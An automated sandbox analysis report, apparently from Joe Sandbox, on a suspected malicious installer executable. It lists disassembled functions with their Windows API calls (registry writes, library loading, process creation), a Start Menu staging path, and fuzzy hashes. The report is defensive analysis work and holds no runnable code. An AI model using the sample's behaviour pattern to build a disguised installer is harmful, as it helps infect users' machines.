                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-1468284503
                            • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                            • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                            • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                            • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 725 73a316db-73a31717 call 73a31a98 729 73a31834-73a31836 725->729 730 73a3171d-73a31721 725->730 731 73a31723-73a31729 call 73a3226f 730->731 732 73a3172a-73a31737 call 73a322b1 730->732 731->732 737 73a31767-73a3176e 732->737 738 73a31739-73a3173e 732->738 739 73a31770-73a3178c call 73a32498 call 73a31559 call 73a31266 GlobalFree 737->739 740 73a3178e-73a31792 737->740 741 73a31740-73a31741 738->741 742 73a31759-73a3175c 738->742 764 73a317e3-73a317e7 739->764 747 73a31794-73a317da call 73a3156b call 73a32498 740->747 748 73a317dc-73a317e2 call 73a32498 740->748 745 73a31743-73a31744 741->745 746 73a31749-73a3174a call 73a329f8 741->746 742->737 743 73a3175e-73a3175f call 73a32c83 742->743 756 73a31764 743->756 752 73a31751-73a31757 call 73a32672 745->752 753 73a31746-73a31747 745->753 759 73a3174f 746->759 747->764 748->764 763 73a31766 752->763 753->737 753->746 756->763 759->756 763->737 768 73a31824-73a3182b 764->768 769 73a317e9-73a317f7 call 73a3245e 764->769 768->729 771 73a3182d-73a3182e GlobalFree 768->771 775 73a317f9-73a317fc 769->775 776 73a3180f-73a31816 769->776 771->729 775->776 777 73a317fe-73a31806 775->777 776->768 778 73a31818-73a31823 call 73a314e2 776->778 777->776 779 73a31808-73a31809 FreeLibrary 777->779 778->768 779->776
                            APIs
                              • Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CE7
                              • Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CEC
                              • Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CF1
                            • GlobalFree.KERNEL32(00000000), ref: 73A31786
                            • FreeLibrary.KERNEL32(?), ref: 73A31809
                            • GlobalFree.KERNEL32(00000000), ref: 73A3182E
                              • Part of subcall function 73A3226F: GlobalAlloc.KERNEL32(00000040,?), ref: 73A322A0
                              • Part of subcall function 73A32672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73A31757,00000000), ref: 73A32742
                              • Part of subcall function 73A3156B: wsprintfA.USER32 ref: 73A31599
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$Free$Alloc$Librarywsprintf
                            • String ID:
                            • API String ID: 3962662361-3916222277
                            • Opcode ID: fb28ec60967e004a718efb2c2e530ff9a31335b3962c64d1c08fc00b56ef01c2
                            • Instruction ID: 3443b3db8ce747547400a12c0c38b6462c0bfa02d28fb297521bd9f0b579e7f5
                            • Opcode Fuzzy Hash: fb28ec60967e004a718efb2c2e530ff9a31335b3962c64d1c08fc00b56ef01c2
                            • Instruction Fuzzy Hash: 3B4164715043089BDB01BF64DE86B9537ACFF0B314F98846BE94B5A1DDDB788045CBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 782 4023d6-402407 call 402acb * 2 call 402b5b 789 402957-402966 782->789 790 40240d-402417 782->790 792 402427-40242a 790->792 793 402419-402426 call 402acb lstrlenA 790->793 796 40242c-40243d call 402aa9 792->796 797 40243e-402441 792->797 793->792 796->797 800 402452-402466 RegSetValueExA 797->800 801 402443-40244d call 402f9c 797->801 804 402468 800->804 805 40246b-402548 RegCloseKey 800->805 801->800 804->805 805->789 807 40271c-402723 805->807 807->789
                            APIs
                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000023,00000011,00000002), ref: 00402421
                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 0040245E
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseValuelstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp
                            • API String ID: 2655323295-1063250699
                            • Opcode ID: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
                            • Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
                            • Opcode Fuzzy Hash: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
                            • Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68
                            APIs
                            • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 0040202E
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
                              • Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 0040203E
                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                            • String ID:
                            • API String ID: 2987980305-0
                            • Opcode ID: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                            • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                            • Opcode Fuzzy Hash: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                            • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                            APIs
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Close$Enum
                            • String ID:
                            • API String ID: 464197530-0
                            • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                            • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                            • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                            • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8
                            APIs
                              • Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
                              • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                              • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                              • Part of subcall function 0040558D: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,000000F0), ref: 0040163C
                            Strings
                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00401631
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand
                            • API String ID: 1892508949-780878960
                            • Opcode ID: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
                            • Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
                            • Opcode Fuzzy Hash: 1e12dc58e4d13fb2c03f22d9bcf658ec8ff8130bfea1f6cb9c78c2b11c1f55b0
                            • Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F
                            APIs
                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                            • CloseHandle.KERNEL32(?), ref: 00405675
                            Strings
                            • Error launching installer, xrefs: 00405652
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID: Error launching installer
                            • API String ID: 3712363035-66219284
                            • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                            • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                            • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                            • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C
                            APIs
                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Enum$CloseValue
                            • String ID:
                            • API String ID: 397863658-0
                            • Opcode ID: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
                            • Instruction ID: d6682fe5282a570b067a4eb437d7391ea775acd6fa74fe75c745453303d77b76
                            • Opcode Fuzzy Hash: fe11d6a5c121a434299ef885feeb2d1068af58094f9e7a5c63dd1c2f174868b0
                            • Instruction Fuzzy Hash: FF01B1B1A00205BFEB119FA59E9CEBF7A7CDF40348F10003EF005A61C0DAB84A459729
                            APIs
                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID:
                            • API String ID: 3356406503-0
                            • Opcode ID: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
                            • Instruction ID: 95e09d1afac246f862a709281cbe64e29327228dc2655ecd66478bf0894335ce
                            • Opcode Fuzzy Hash: 9faefa671d32cd00ae6c9ab0d3038af98ca3d674d6845910c3f8f86525e159a4
                            • Instruction Fuzzy Hash: 9811A371A01205FFDB15DF64DA989AEBBB4DF10348F20843FE445B72C0D6B84A85DB69
                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                            • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                            • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                            • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                            APIs
                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
                            • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CloseDeleteValue
                            • String ID:
                            • API String ID: 2831762973-0
                            • Opcode ID: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
                            • Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
                            • Opcode Fuzzy Hash: 23a66d4d5fdd4b42974711a2d0e6844d1454a946aa1d815d9b14ac0364ce1981
                            • Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D
                            APIs
                            • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                            • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$EnableShow
                            • String ID:
                            • API String ID: 1136574915-0
                            • Opcode ID: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
                            • Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
                            • Opcode Fuzzy Hash: 76e0b40bc866335bf4808b12ec94f7b59f7a2b12cc41b8e9cd369490a2b1e57e
                            • Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D
                            APIs
                            • ShowWindow.USER32(0001042C), ref: 00401581
                            • ShowWindow.USER32(00010426), ref: 00401596
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
